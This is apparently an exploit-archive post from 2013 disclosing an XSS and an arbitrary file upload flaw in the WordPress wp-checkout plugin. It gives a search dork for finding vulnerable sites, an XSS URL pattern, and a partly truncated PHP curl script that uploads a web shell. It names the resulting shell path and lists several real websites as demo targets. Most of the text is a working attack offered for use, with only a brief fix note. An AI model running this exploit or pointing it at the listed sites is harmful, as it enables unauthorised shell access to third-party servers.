#Title : Wordpress Plugin wp-checkout XSS / Arbitrary File Upload
#Author : DevilScreaM
#Date : 10/31/2013
#Category : Web Applications
#Type : PHP
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Vulnerabillity : xss, Arbitrary File Upload
#Dork :
inurl:wp-content/plugins/wp-checkout
Cross Site Scripting
http://site-target/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=[XSS]
Example
http://osteopathywinchester.co.uk/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=DevilScreaM
http://pacificcrest.org/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=DevilScreaM
Solution
Upgrade Version Timthumb or Delete Files timthumb.php
=================================================================================================
Arbitrary File Upload
Exploit : http://site-target/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
"@$uploadfile",
'folder'=>'/wp-content/uploads/wp-checkout/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://site-target/wp-content/uploads/wp-checkout/devilscream.php
Demo :
http://prittybypri.com/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
http://windham73.com/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
http://twobuttons.com/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
http://riosdeaguavivaupci.com/hp_wordpress/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
http://brookesprevention.org/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
http://theheartofawoman.net/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php